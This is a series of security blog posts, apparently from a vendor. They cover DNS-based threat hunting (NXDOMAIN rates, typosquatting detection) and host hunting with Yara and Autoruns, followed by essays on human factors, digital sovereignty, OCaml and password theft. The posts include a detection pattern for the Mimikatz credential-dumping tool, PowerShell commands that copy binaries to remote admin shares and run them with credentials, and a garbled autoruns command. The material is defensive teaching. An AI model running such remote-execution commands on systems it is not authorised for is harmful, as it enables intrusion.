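Computing the per-client NXDOMAIN rate is a one-pass aggregation; in the sketch below, the record schema and the 5% threshold are illustrative — a real baseline should come from your own network's history:

```python
from collections import defaultdict

def nxdomain_outliers(records, threshold=0.05):
    """Return clients whose NXDOMAIN rate exceeds the threshold."""
    totals, errors = defaultdict(int), defaultdict(int)
    for r in records:
        totals[r["client"]] += 1
        if r["rcode"] == 3:          # rcode 3 = NXDOMAIN
            errors[r["client"]] += 1
    return {c: errors[c] / totals[c] for c in totals
            if errors[c] / totals[c] > threshold}

# One client failing 40% of lookups (likely DGA-infected), one at 1%.
records = ([{"client": "10.0.0.5", "rcode": 3}] * 40 +
           [{"client": "10.0.0.5", "rcode": 0}] * 60 +
           [{"client": "10.0.0.9", "rcode": 0}] * 99 +
           [{"client": "10.0.0.9", "rcode": 3}] * 1)
```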

 

Phishing Detection

Recent phishing campaigns often rely on a slight typo of a domain, or utilize a brand name to make it look genuine. In the first case, the phishing domains are slightly modified versions of the real domain, while still retaining some resemblance to it. This is the next higher-order pattern to hunt: ‘DNS queries for domains that are slightly modified versions of a popular domain’. Edit distance (Levenshtein distance) measures the level of modification between two domains: it is the minimum number of single-character edits (insertions, deletions, or substitutions) required to change one word into the other. Each DNS query can be analyzed for its edit distance from popular domains. A potential phishing attempt may exhibit a low edit distance from a popular domain, especially when the registrants differ.
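A standard dynamic-programming Levenshtein implementation is enough to sketch this check; the popular-domain watch list here is a small hypothetical example:

```python
def edit_distance(a, b):
    """Levenshtein distance via dynamic programming (two rows)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]

POPULAR = ["paypal.com", "google.com", "microsoft.com"]

def near_misses(query, max_dist=2):
    """Popular domains within a small edit distance of the query --
    typosquatting candidates, pending a WHOIS check."""
    return [d for d in POPULAR
            if 0 < edit_distance(query, d) <= max_dist]
```

An exact match (distance 0) is excluded, since the legitimate domain itself is not a phishing candidate.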

phishing example

In other cases, a phishing domain contains a familiar brand name to appear genuine. This is another higher-order pattern: 'DNS queries for domains that contain a popular brand name'. A suffix tree of popular domains and brand names can perform at scale, matching the longest common substring against each DNS query. Once identified, it is important to validate such outliers by checking the WHOIS records.
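At sketch scale, plain substring search stands in for the suffix tree; the brand watch list and the simple "registered domain is the second-to-last label" heuristic below are both assumptions for illustration:

```python
BRANDS = ["paypal", "apple", "microsoft"]   # hypothetical watch list

def brand_impersonation(fqdn):
    """Return brands embedded in a domain that is not the brand's own
    registered domain -- candidates for WHOIS validation."""
    labels = fqdn.lower().split(".")
    registered = labels[-2] if len(labels) >= 2 else labels[0]
    return [b for b in BRANDS if b in fqdn.lower() and registered != b]
```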

DIY Outlier Detection

There are many additional patterns in passive DNS data that can drive your hunt. A fundamental principle of hunting is looking across your dataset and identifying outliers in that data. Doing this over time is an effective way to perform outlier analysis for network data. This boils down to creating additional hunting techniques using the following steps:

  1. Select one or more features or characteristics of DNS traffic.
  2. Discover the normal range or set of values for that particular feature(s).
  3. Find records where the feature deviates considerably from the normal.

Let’s take query type as an example. First, we discover the distribution of queries by type. Say we observe that 93% of queries are for A records, 6% for NS records, and 1% for MX records. If we suddenly observe a much higher rate of MX queries, we have an outlier that we should investigate; this could indicate a malware infection that sends spam. This is the last higher-order pattern: “features or characteristics that deviate from the normal distribution of the data.” Similarly, if we take a distribution of queries by TLD and find a large number of queries to a TLD outside of that distribution, we have an outlier that warrants further analysis.
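The three-step recipe applied to query type can be sketched in a few lines; the 3x deviation factor and the counts below are hypothetical choices, not recommended values:

```python
def qtype_outliers(baseline, window, factor=3.0):
    """Learn each query type's normal share from a baseline period,
    then flag types whose share in the current window exceeds that
    expectation by `factor`."""
    base_total = sum(baseline.values())
    win_total = sum(window.values())
    flagged = {}
    for qtype, count in window.items():
        expected = baseline.get(qtype, 0) / base_total
        observed = count / win_total
        if expected and observed > factor * expected:
            flagged[qtype] = observed
    return flagged

baseline = {"A": 930, "NS": 60, "MX": 10}   # ~93% / 6% / 1%
window = {"A": 80, "NS": 5, "MX": 15}       # MX share jumps to 15%
```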

Note that, as with any outlier detection, you will have false positives. Part of the hunting process is understanding what is normal for your organization and incorporating that information into your analytic process.

 

Conclusion

Adversary hunting using passive DNS can be a rewarding experience, both in terms of understanding the network and its peculiarities, and for finding targeted threats such as APTs that evade usual IOC-based search. There are many known patterns and signals that indicate malicious behavior. These higher-order patterns provide a heuristic for anyone new to hunting on networks. The following are great places to start:

  • Domains that resolve to a large number of IPs, where those IPs are diverse both by ownership and geography
  • Domains with abnormal lexicographical structure
  • A higher than normal rate of NXDOMAIN errors
  • DNS queries for domains that are slightly modified versions of a popular domain
  • DNS queries for domains that contain a popular brand name
  • Features or characteristics that deviate from the normal distribution of the data

Other patterns exist as well. More manual, quantitative analysis can also identify outliers based on known normal behavior, such as query types. Together, these are solid, open source first steps to begin hunting within networks.

The network is not the only place to hunt.  In fact, a richer set of data is available on your endpoints to feed hunting operations.   In our subsequent and final post on hunting on the cheap, we’ll address hunting on hosts.

Hunting on the Cheap, part 3: Hunting on Hosts


In our previous posts, we focused on hunting on the cheap by collecting and analyzing data on the network. However, hunting on networks is not the only option. In fact, a richer set of data to find unknown malicious activity in your enterprise is available by looking on and across your hosts and servers. This can include running processes, active network connections, listening ports, artifacts in the file system, user logs, autoruns, and more. With all this data, the tough part is deciding what to focus on as you start your hunting process. Once you’ve determined areas of focus, you can collect data, look for suspicious outliers, and investigate further. In this final post in the series on how to get started with hunting, we’ll describe some tips for hunting on your hosts using freely available tools. These techniques are simplified first steps to help you find evidence of malicious activity on your hosts - with or without signatures and IOCs. You can do this for free, while still getting a taste of the power of hunting.

 

Searching with Indicators

A common starting point is to look for IOCs (Indicators of Compromise) across your hosts.  While many call this hunting, it’s really just searching. And not just searching, but searching for indicators that are fleeting and constantly morphing.  In fact, the useful lifespan of an IOC is declining due to trends in adversary behavior.  Most security professionals already know this, and it was underscored in Verizon’s DBIR released last week.  That said, due diligence still necessitates searching across your systems for known IOCs, which remains a useful first step.  The following are several websites that publish freely available threat intelligence information in various forms.

 

IOC Source

 

One of the more resilient and useful IOCs to use on your hosts is a well-written Yara signature. Yara applies binary patterns and sequences to detect and categorize badness on your system. Yara is similar to grep, which searches for matches against a list of known patterns, but Yara does much more, scanning both files on disk and memory for binary patterns. A good malware analyst can in many cases craft a Yara signature that detects not only identical copies of a piece of malware but also variants of the tool, new versions of the tool, or even follow-on tools in the same malware family, by focusing on unique patterns in the binary which are likely to survive code reuse. For this reason, Yara is one of our favorite open source tools for identifying malware. And even better, it’s free.
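The core idea of the grep analogy can be shown with a few lines of Python. This is only an illustration of pattern sweeping, not a Yara replacement — Yara layers rule logic, wildcards, and in-memory scanning on top of it, and the demo directory and byte pattern below are invented:

```python
import os
import tempfile

def scan_files(root, patterns):
    """Grep-style sweep: return files under `root` whose contents
    contain any of the given byte patterns."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                if any(p in f.read() for p in patterns):
                    hits.append(path)
    return hits

# Demo on a throwaway directory with one "malicious" artifact.
demo = tempfile.mkdtemp()
with open(os.path.join(demo, "dropper.bin"), "wb") as f:
    f.write(b"...mimikatz...")
with open(os.path.join(demo, "notes.txt"), "wb") as f:
    f.write(b"benign contents")
matches = scan_files(demo, [b"mimikatz"])
```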

 

Yara in Action

Yara rules are a great way to structure a known malicious pattern based on textual or binary sequences.  The following is a snippet of a robust Yara signature that detects Mimikatz, a tool used by adversaries and red teams to extract Windows credentials from memory. This particular signature was actually written by the author of the Mimikatz tool itself.

Rule Mimikatz

 

You can run Yara locally but it is even more powerful when run remotely on a single machine or across multiple machines.  Powershell can facilitate this. Running Yara remotely via Powershell can be done in a few simple steps, assuming you have credentials to the hosts and Powershell remoting is enabled.

 

Transfer Yara binary to target machine w/ native Windows functionality

PS> copy yara.exe \\TARGET-HOST\C$\TEMP\yara.exe

Transfer rules

PS> copy rules.yara \\TARGET-HOST\C$\TEMP\rules.yara

Execute scan w/ Invoke-Command

PS> Invoke-Command -ComputerName TARGET -ScriptBlock { c:\TEMP\yara.exe c:\TEMP\rules.yara c:\targetdir } -credential USER

This will have the effect of running a set of Yara rules (rules.yara in the above example) on a given directory (c:\targetdir in the above example).  It can easily be extended to search across the entire disk and across many hosts and identify exactly where a binary matching your signature exists on the hosts.  

This is very powerful, but is not without shortcomings. As we all know, signatures are brittle. This not only leads to false positives if the Yara signature is poorly written, but with the rapid pace of change of malware, rules need to be constantly updated or they become obsolete. This can be extremely resource and time intensive.  However, compared to searching for hashes, filenames, and other artifacts which are commonly used in IOC search, using Yara can be a more powerful and resilient approach.  

 

Hunting without Intelligence

Even if you have IOCs as a starting point, IOCs are not good enough to find all possible malicious activity in your enterprise.  This is where hunting comes into play.  Hunting is the systematic and proactive pursuit of unknown threats. This entails the identification of patterns and suspiciousness in your data that may indicate badness on your network.  As mentioned above, there are many places you can hunt on the host.  We suggest starting with autoruns.  Adversaries usually want to persist across reboots on at least some systems in your network.  Doing so is critical to entrenchment in your network for the long haul.

Autorun items are a good place to look for outliers and suspiciousness for several reasons. Autoruns tend to be relatively consistent across a network, rendering pure outlier analysis feasible. Any autorun showing up in only a handful of places may indicate badness, though these can be hard to find given all of the locations that need to be analyzed. Additionally, files must be dropped to disk for autorun persistence. Some actors do obvious things you can treat as suspicious – for example, executing out of the %TEMP% folder with an obviously strange filename. In many environments, malicious autoruns stand out and can be detected by a good hunter. Once a malicious autorun is detected, deeper analysis can commence to confirm and deal with a compromise.

 

Collecting Autoruns

There are over one hundred places where an adversary can persist on a modern Windows machine.  This includes startup registry keys, services, drivers, browser and Office add-ons, and many other less well-known places and methods.  Beyond the sheer number of locations, grabbing the necessary data for analysis is non-trivial due to the way data is formatted by the operating system.  Sysinternals (maintained by Microsoft) created a tool called Autoruns to tackle this problem, free of charge.  While not perfect, this tool does a great job pulling in the right data for most autorun items on a Windows system, hashes them, and allows for some basic enrichment (such as submitting to VirusTotal).

We recommend using the command line version of autoruns (autorunsc.exe) in tandem with Powershell for remote gathering of autoruns from your systems.  This can be done in a few steps:

 

Transfer Autoruns binary and the required msvcr100.DLL to target machine w/ native Windows functionality

PS> copy autorunsc.exe \\TARGET-HOST\C$\TEMP\autorunsc.exe

PS> copy msvcr100.dll \\TARGET-HOST\C$\TEMP\msvcr100.dll

Execute program w/ Invoke-Command (w/ optional output)

PS> Invoke-Command -ComputerName TARGET -ScriptBlock { c:\TEMP\autorunsc.exe -a (??) -h (>> c:\TEMP\autoruns-output.txt) } -credential USER

Collect output

PS> copy \\TARGET-HOST\C$\TEMP\autoruns-output.txt c:\directory

As before, this can be extended to gather data from many systems across your network.  

 

Analyzing Data

We recommend submitting all autorun hashes to VirusTotal as the first step in your investigation. Anything that comes back as malware is... well... malware, and you should prioritize these for additional investigation. Fortunately, this can be done inline with Sysinternals, or you can easily build something with the VirusTotal API.

So you’ve collected all your autoruns and determined whether any are known malware. That’s a good step, but you shouldn’t stop there. To truly hunt for unknown badness, you need to look for anomalies in the data. There are many ways to do this, but we’d recommend first stacking by hash and looking for outliers that don’t match the general population of the data. To do this, pull hashes of all autorun items as described earlier, and then list them out as HOST:HASH. The following provides a concrete example of how this might look (note that you will have many more autoruns for each machine in a real environment).

 

Cat Hash Map

 

An easy next step is to split the output on the colon delimiter (:) and extract the hash field:

# cat hash-map.txt | cut -d':' -f2 > hashes.txt

And then reduce and sort by the number of occurrences across your systems to quickly identify the anomalies.
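The same stacking can be done in a few lines of Python if you prefer to script it; the host/hash pairs and the `max_hosts` cutoff below are toy values for illustration:

```python
from collections import Counter

def rare_hashes(host_hash_pairs, max_hosts=2):
    """Stack autorun hashes across hosts and surface ones seen on
    only a few machines -- the outliers worth a closer look."""
    counts = Counter(h for _, h in host_hash_pairs)
    return {h: n for h, n in counts.items() if n <= max_hosts}

# Two hashes present fleet-wide, one present on a single host.
pairs = [("host1", "aaa111"), ("host2", "aaa111"), ("host3", "aaa111"),
         ("host1", "bbb222"), ("host2", "bbb222"), ("host3", "bbb222"),
         ("host2", "ccc333")]
```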

 

Cat Hashes

 

In this example, we had 42 systems.  Many autoruns appeared on each system.  A couple only appeared on one.  These outliers could be suspicious.  A reasonable first step would be to look at the detailed output of autoruns from the host(s) where the outlier was seen.  You may note a strange description, strange filename, strange autostart location, or more.   The following example shows a binary named “svcchost.exe” executing on startup from C:\WINDOWS\temp:

svcchost

 

The next example shows a binary executing on startup from the recycling bin with a one-character filename, both definite signs of something strange going on.

Recycler

 

These are not the only suspicious things you can find in autoruns data; there are many more approaches. You can take this much further, for example, by indexing all of the data in Elasticsearch (another freely available capability) for fast search and exploration across your data, regularly collecting autoruns from your endpoints, and looking for changes in autoruns over time. And, of course, many other endpoint artifacts are prime locations for hunting. A true hunt effort should expand in scope to cover user logs, processes, network information, and more.

 

Summary

Over this three-part series of posts, we’ve provided several approaches using only free software to help you begin hunting on both networks and hosts. Hunt techniques are not reliant on ephemeral and constantly morphing signatures or IOCs, and thereby better match the sophistication of modern adversary techniques. Every organization and researcher should begin proactively hunting to detect unknown threats inside the network. From passive DNS to autoruns, we’ve covered a lot of ground and described a variety of free and powerful approaches for hunting on hosts and networks. Have fun!

The Real “Weakest Link” In Security Isn’t What You Think: Why We Should Rethink the Narrative That Humans Are What Make Us Less Secure


It’s an all-too-familiar story: a company reports a data breach, and there’s an immediate blame game. Inevitably, we point the finger at humans — the person who responded to that phishing email (a fake message that a bad actor uses to gain access to a broader set of data or a network) or who unknowingly clicked on ransomware “malvertising” (a fake ad that, when clicked, releases malware that locks digital files and demands a ransom to release the data).

Humans, we’re told, are the weak link of security. That was a key theme in the Verizon Data Breach Investigations Report released last week. After all, ransomware and phishing are effective because they’re able to so skillfully target human vulnerabilities.

Here’s the problem: human vulnerabilities will always exist. This old way of thinking — that people are the problem, and we can somehow change entrenched human behavior — isn’t getting us anywhere. Even with improved training and education, given the sophistication of the attacks, human vulnerabilities will persist. So we need to rethink this paradigm: What if we started viewing human-computer interaction as a means to increase security? How could we use what humans do best — critical thinking and contextualization — and combine it with what computers do best — automation and scale — to make us all safer?

We can start with a more “human-centric” approach to security — in other words, designing products and solutions with human strengths and vulnerabilities in mind. Here are three examples of ways that this approach could make us all more secure:

 

1) Alert fatigue — Monitoring systems with an overabundance of alerts aren’t just ineffective but lethal. With so many low-priority alerts, users simply ignore them or have little ability to differentiate between high- and low-priority alerts. And given the vast amount of data, it’s impossible to respond to every single alert. For instance, at Target, the security team received and ignored alarms — in part because there were just so many. Many have pointed to this as human failure, but in reality it was a failure of human-computer interaction. With so many alerts, very few teams have the time or capability to sift in depth through every alert received. Even with the best judgment, alerts from systems that do little to inform and prioritize are simply ignored. In contrast, monitoring systems that integrate automation with human-driven domain expertise and prioritization could be a first step toward more precise and relevant alerts, decreasing dwell time and expediting incident response.

 

2) Data exploration — Analyzing and protecting big data is getting more and more complicated as the amount of data we generate increases, and as attackers begin not only to steal data but to manipulate it, too. We need to create faster and more effective ways to explore the data required to analyze and detect intrusions, especially in the face of an industry-wide talent shortage. In short, there is too much data and too few people to analyze it, and this problem is only growing. So how do we explore data faster and more efficiently? Cognitive methods aimed not just at supporting human hypotheses but also at proactively surfacing key insights will be an essential component of improved security. Machine learning and other forms of automation help scale these capabilities, and provide much faster insights than is possible through human analysis alone. For instance, in the commercial realm, cognitive computing helps answer customer and supplier questions, or in finance can identify optimal investment portfolios. These technologies not only remove the arduous processes of data structuring and merging, but also provide optimized analytics so humans can devote their time to the important analysis, contextualization, and interpretation of the data required to detect and contain attacks. These tools do not replace the analyst, but provide greater, faster, and more scalable analytic capabilities to help prioritize and gain insights from data, greatly impacting detection and prevention of anomalous behavior. Automation and advanced data analytics also help security teams optimize their resources, enabling greater detection across seemingly infinite data with finite resources.

 

3) Mind the C-Suite Gap — It’s as high-stakes as communication struggles get: security teams are often unable to put their work and issues into language that CEOs can understand. When they can’t communicate effectively to company leaders, their warnings are disregarded, with devastating consequences. The C-suite increasingly bears the brunt of breaches — leading to turnover of CEOs and government leaders — but may not grasp the complexities or resources required for security. Data visualization can bridge that gap. Think of it as a storytelling medium, conveying complex data in a consumable manner. Intuitive, interactive, and concise data visualization can express multifaceted concepts far more efficiently than a presentation full of log data.

We hear a lot about changing human nature as the key to digital security. While education and training are essential, human behavior is nearly impossible to change and isn’t a silver bullet. Instead, let’s focus on building technologies that leverage the best parts of computers and humans working together. It could go a long way to address the increasingly complex challenges in the digital domain.

This post was previously published by New America.

Digital Sovereignty: Multi-Stakeholder vs. Beggar-Thy-Neighbor Digital Futures


What do Yeti, ICANN, and BRICs have in common? They are emblematic of the growing international jockeying for power to shape the global digital order. Absent a global cyber regime, nation-states continue to pursue self-interested international and domestic policies, which has produced the evolving movement toward digital sovereignty.

While an open and free internet is consistent with many states' interests, this is far from universally true. Many states' policies are more reminiscent of beggar-thy-neighbor trade policies, wherein states pursue self-interested policies that worsen the situation of other states. To counter this growth of autarkic digital policies, there have been quiet but potentially impactful moves by the US to assert a multi-stakeholder model. If history is any guide, it will likely take a major shock to the system to truly embed the norms the US continues to push. Until then, we’re likely to continue to see states asserting their digital sovereignty in ways that not only impact global connectivity, but also have strong implications for international commerce, privacy, and security.

 

A Beggar-Thy-Neighbor Digital World Order

The latest wave of digital sovereignty is disguised as a push for privacy. China is leading the way in this realm, balancing domestic censorship, data leaks, and a quiet but growing crackdown on foreign tech companies. This push for cyber sovereignty is instigated by the need to control information and limit foreign competition. The Cyberspace Administration of China (CAC) – China’s Internet watchdog – released an announcement in January soliciting input on a proposal to increase censorship of news outlets, emphasizing privacy protection of personally identifiable information. The CAC also leads the push for more regulations on international companies, demanding source code and other IP as the price to pay for access to China’s enormous market. The CAC controls censorship and has been blamed for offensive attacks against US companies, including a public allegation by GreatFire.org, a non-profit organization fighting for online freedom in China. This is the same organization that was at the center of the GitHub attacks in April 2015.

China has global aspirations for their model as well, laying the groundwork for alternatives to the modern Internet. Russian and Chinese officials met last month to discuss digital strategy, just the latest step in their push for digital sovereignty, with Russia seeking to learn from China and augment its own information controls along the lines of the Great Firewall. Brazil is also taking a page from this playbook, with growing government involvement in information control, such as blocking the messaging platform WhatsApp. These initiatives focused on information control are part of a global effort to shape the digital order. With India’s ascent to lead the BRICS (Brazil, Russia, India, China, and now South Africa), discussion among the group is increasingly dominated by ways to shape the global digital order. While it remains a group with diverse interests, they nevertheless seek a role in shaping the future of the Internet. Similarly, there are smaller efforts such as Project Yeti, which aspires to redirect traffic from the Internet to an alternate root. It is driven largely by technical considerations, as well as by the desire to counter the risk of Western surveillance. The Beijing Internet Institute runs Project Yeti, in conjunction with a Japan-based group and computer scientists.

 

Multi-Stakeholder Initiatives

From the perspective of many regional powers, the US government (via the Internet Corporation for Assigned Names and Numbers, or ICANN) and US companies (via their technology) control the Internet. In an attempt to offset these negative perceptions and to implement global digital norms, the US continues to seek ways to shape the digital world order toward a free and open multi-stakeholder model. Relinquishing control of ICANN is a first step toward this model. Currently reporting to the US Department of Commerce, ICANN controls naming conventions, matching domains and IP addresses. However, in 2014, President Obama announced that ICANN will transition this role to a global, private group. This is set to occur in September 2016. As part of this outreach to the global community, ICANN will host a global meeting in Hyderabad, India, in November.

The US also continues to push this multi-stakeholder model at the UN’s Group of Governmental Experts (GGE). A new report by the GGE, agreed upon by 20 governments including the US, China, and Russia, proposes a range of international norms for cyber activity. Clearly, this ties into other ongoing discussions on defining cyber acts of war, but focuses more on those activities that fall below the threshold of use of force, such as espionage and IP theft. With so many distinct interests, there are numerous collective action problems with international cooperation and shaping these norms. That said, the United States' push for global norms and a multi-stakeholder model is emblematic of its global campaign to counter perceptions of its hegemonic control of the internet.

 

The Way Ahead

While some predict that the Internet will approach global saturation by 2020, these projections largely assume an uninterrupted current trajectory. Despite decades of Internet growth, there is momentum for greater control of the Internet. Many regional powers are increasingly looking to digital sovereignty as a means to maintain greater domestic control and exert global influence. The US is taking steps to counter this movement with a multi-stakeholder model, but that model relies on global cooperation, which remains a challenge. This jockeying for power between two competing perspectives is only likely to grow, and it has great implications for the future of the global digital order.


Hunting Your Adversaries with Endgame Enterprise: Meet Us at Gartner


Endgame was at the Gartner Security & Risk Management Summit in 2015 showing Endgame Enterprise, the industry's first endpoint detection and response platform to hunt, contain, and eliminate adversaries that bypass signature- and perimeter-based security solutions. Featuring advanced threat intelligence, behavioral analysis, and attack chain modeling, Endgame Enterprise "thinks like the adversary", enabling customers to detect and respond faster to unknown threats, preventing damage and loss. To keep the conversation going, contact us here.

Build Safer Programs Faster with OCaml


For many internal prototypes at Endgame, we adopt an agile development process to rapidly build proof-of-concept services which can then be deployed and iterated upon to quickly address bugs and introduce new features. Our R&D and DevOps groups maintain and improve dozens of interconnected services, from training machine learning models on malware samples to processing and analyzing domain information. However, many DevOps and R&D requirements are iterative and fluid, and it can be difficult to write services that are fast, safe, and extensible enough to address these changing needs.

For many of our previous services, we utilized Python for its quick development turnaround and rich library ecosystem. However, we often encounter issues that arise from the aforementioned “quick” development, such as occasional bugs arising from type errors, or poor error handling causing service downtime. Hastily written services can also be difficult to refactor as their structure may become convoluted over time.

While many in our DevOps and R&D teams have Python backgrounds and continue to use it for many tasks, we have recently begun to use functional programming in OCaml to solve some of the issues that arise with rapid Python development. OCaml is a compiled, strongly typed programming language that emphasizes safety and expressiveness. It boasts a mature ecosystem of tools and libraries, and has been most used in industries which require a high degree of confidence in bug-free, performant code.  While it is considered a multi-paradigm language, OCaml strongly emphasizes a functional programming style, which provides many of the benefits covered in this post. With OCaml, we have improved our ability to adapt to changing requirements, and trust that the software we write is more stable and correct.

 

[Image: a distraught man juggling five hatchets]

The freedom of programming in a dynamically typed language (Image source)

 

Python, we still want you around...

Many teams at Endgame still use Python for the majority of their development, and it has continued to provide great value for quickly getting services up-and-running. For many tasks in R&D, however, we needed a language that would allow us to refactor more easily, provide greater runtime safety, and catch more errors at compile time. Python did not quite meet our development, safety, and refactoring needs. We found that:

  • Python is fast to prototype/script in, but handling large amounts of data can sometimes expose issues that crop up due to dynamic typing.
  • Handling JSON in particular can allow for runtime errors, as free-form input or mangled data causes type-unsafe functions to fail unexpectedly.
  • Python is relatively slow in runtime performance due to its interpreted nature.
  • Packaging and deploying Python programs requires also deploying a Python interpreter, which itself requires many additional dependencies.
  • Codebases written hastily in imperative languages can often devolve into ball-of-mud refactoring nightmares, especially with reliance on deeply nested polymorphic inheritance or proliferation of global state. Python often does little to encourage separation of external IO concerns from internal program logic. Without regular attention given to design and style, shared mutable variables can cause baffling behavior in large programs.

 

....But OCaml has what we need!

When an Endgamer with extensive previous functional programming experience suggested that our workflow could benefit from the balance of speed and safety that OCaml provides, we found that many of its features addressed our issues with Python.  We had several requirements for a new language if we were going to augment Python for DevOps and R&D:

 

Requirement: A language in which we could write a service quickly (Terseness/Expressiveness).

  • OCaml's syntax is extremely concise, while allowing for high-level programming features. This includes:
    • A type system with algebraic data types and variants.
    • Higher-order functions, partial function application, and currying.
    • Option types, which require callers to handle potential errors or the absence of a result.
    • A powerful pattern-matching system.
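Taken together, these features make small services concise. Below is a minimal, self-contained sketch; the config-lookup scenario and all names are invented for illustration:

```ocaml
(* A variant type modeling a parsed service config value. *)
type value =
  | Int of int
  | Str of string

(* Option types force callers to handle the "not found" case:
   [lookup] returns [None] instead of raising or returning null. *)
let lookup key pairs =
  try Some (List.assoc key pairs) with Not_found -> None

(* Pattern matching makes every case explicit; the compiler warns
   if a constructor is forgotten. *)
let describe = function
  | Some (Int n) -> Printf.sprintf "int: %d" n
  | Some (Str s) -> Printf.sprintf "string: %s" s
  | None -> "missing"

(* Partial application: [find_port] is [lookup] specialized to one key. *)
let find_port = lookup "port"

let () =
  let config = [ ("port", Int 8080); ("host", Str "localhost") ] in
  print_endline (describe (find_port config));
  print_endline (describe (lookup "missing" config))
```

Because the match in `describe` covers every constructor of `value option`, adding a new constructor later triggers a compile-time warning at every match that needs updating.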

 

Requirement: A language with fast performance.

 

Requirement: A language that is easy to refactor. Due to the agile requirements process of R&D, we needed to be able to redesign service components easily.

 

Requirement: A language with more runtime safety guarantees.

  • This allows developers to write safer code, and safer libraries for reuse.
  • OCaml's type system allows for complex and expressive hierarchies of types checked by Hindley-Milner type inference.
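As a brief illustration of that inference at work, none of the bindings below carry type annotations, yet each receives a precise (and, where possible, polymorphic) type at compile time; the examples are our own, not from any particular Endgame service:

```ocaml
(* Inferred: ('a -> 'b) -> ('c -> 'a) -> 'c -> 'b *)
let compose f g x = f (g x)

(* Inferred: int -> int, because (+) operates only on ints in OCaml. *)
let double n = n + n

(* Inferred: float -> float; float arithmetic uses distinct operators
   (/., +.), so mixing ints and floats is a compile-time error. *)
let half x = x /. 2.0

let () =
  Printf.printf "%d %.1f\n" (compose double double 3) (half 5.0)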

 

Requirement: A mature language with library support for common use cases, as well as C Foreign Function Interface (FFI) bindings to extend external code as needed.

  • Much of OCaml’s library base is mature and has been stable and heavily tested for years.
  • OCaml’s Ctypes library allows for extremely simple binding to external C/C++ libraries.

 

Recently, many others have reached similar conclusions about OCaml’s benefits for systems programming, and have written posts about their experiences with the language:

https://tech.esper.com/2014/07/15/why-we-use-ocaml/

http://roscidus.com/blog/blog/2014/02/13/ocaml-what-you-gain/

http://www2.lib.uchicago.edu/keith/ocaml-class/why.html

So far, OCaml has made it much easier to write fast, stable, and safe services that are easy to return to and refactor later.  In the coming months, we will be publishing a series of technical blog posts describing our usage of OCaml at Endgame, as well as a handful of libraries and frameworks we have developed to support internal development.

 

Stay tuned!

Hacker's Guide to (Not) Having Your Passwords Stolen


Online credential theft has exploded in the past several years.  This month alone, numerous breaches have affected millions of users of high profile websites such as LinkedIn, MySpace, vk.com, and Tumblr. In these cases, criminals are not seeking corporate secrets or nuclear launch codes, but rather usernames and passwords for online accounts of everyday computer users.

Credential theft can come in many different flavors with varying levels of impact, from attacks targeting a single or small set of users, to attacks compromising credentials from within an enterprise, to attacks compromising the credentials of millions of users of an online service. While criminals certainly steal usernames and passwords for corporate accounts for extortion and corporate espionage, this article focuses on the compromise of personal accounts in both targeted attacks and mass data breaches. This includes why criminals steal usernames and passwords, and the most common tactics criminals use to steal them. It concludes with some basic steps you can take to reduce your risk of being targeted, as well as how to respond once you’ve been notified of a password breach.

 

Why do criminals steal usernames and passwords?

The short answer is: for profit, eventually.

The long answer is: it depends.

Hackers steal usernames and passwords from websites for a handful of reasons, but most of them lead to cash eventually. Sometimes criminals steal a database of hundreds of thousands of users from a website and sell it wholesale directly on black market web forums. The larger the database, the more money they can charge for it. Sometimes criminals will use the usernames and passwords to log in to people’s email accounts and send spam email for dubious scam products, making money from referrals and product link-clicks. In each of these cases, the methods of monetization are “quantifiably linear”: the amount of money the criminal makes is strictly tied to the number of usernames and passwords they steal. The value of the individual accounts is not a consideration.

The next reason criminals steal credentials is as a means to gain access to another, more valuable asset. Usernames and passwords by themselves provide very little value, but the assets that those credentials protect are often far more valuable. For example, ten thousand valid Gmail usernames and passwords may be worth several hundred or even thousands of dollars on underground criminal forums, but the ability to reset social media and banking passwords, access cell phone provider accounts, read confidential employer information, and even reset other email accounts provides far more value to an attacker.

Criminals steal credentials ultimately to make money or gain access to a more valuable piece of information. It is this monetization of credentials, and the subsequent growth of underground markets, that drives criminals to steal usernames and passwords.

 

How do hackers steal usernames and passwords?

Attackers steal usernames and passwords in two major ways: by attacking users directly and by attacking the websites people use.

 

Attacking Users Directly

These techniques are effective in stealing usernames and passwords from relatively small numbers of people. If an attacker values the account information of a particular targeted person, these techniques also apply. Some of these methods are obvious to a knowledgeable user and thus easier to protect against. However, as determination and intrusiveness escalate, these methods can be more difficult to stop. While credentials for many victims of this type of attack can be packaged into large numbers for sale or use, this type of activity does not usually make the headlines.

Some criminals use a technique called “phishing.” This process usually looks something like this:

  1. Hacker identifies a large number of Bank of Somewhere customers
  2. Hacker sends legitimate Bank of Somewhere customers a fake login page hosted on a domain that looks similar to "bankofsomewhere.com"
  3. Some small percentage of the victims unwittingly enter their usernames and passwords into the website that the hacker controls
  4. Hacker logs in to the stolen accounts and transfers funds to an account they control

 

Some criminals use even broader phishing attacks to steal social media accounts: 

  1. Hacker sends fake Facebook login pages to as many email accounts as possible stating that there is a problem with their account that needs to be fixed
  2. Some victims enter their Facebook usernames and passwords
  3. Hacker uses access to their Facebook accounts to promote spam and adware-laden websites
  4. Hacker generates ad revenue from fake clicks and page visits

 

Sometimes criminals will want the credentials of a known high-value individual. More care goes into customization and believability in these cases. The attacker may go as far as attempting to impersonate the individual in tech support calls, hacking the actual computer used by the high-value target to collect credentials, or using other invasive techniques. It can be difficult to defend against a determined attack, but fortunately, most of us aren’t of this level of interest to attackers, and the basic online hygiene principles listed below will provide some protection.

 

Attacking a Website Directly

If a criminal wants to steal millions of usernames and passwords and doesn’t care who gets scooped up, they target a website directly. The more credentials they steal, the more money they can get selling them or monetizing them in some other way. This almost always comes in the form of a criminal exploiting a vulnerability in the website itself. The criminal uses one of any number of tactics to gain access to the server supporting the website and steals the credentials directly from the database. The credentials are usually stored as a large set of username and “hashed” password pairs. A password “hash” simply refers to a more secure method of storing a password, where a mathematical representation of the password is stored in lieu of the plaintext password.

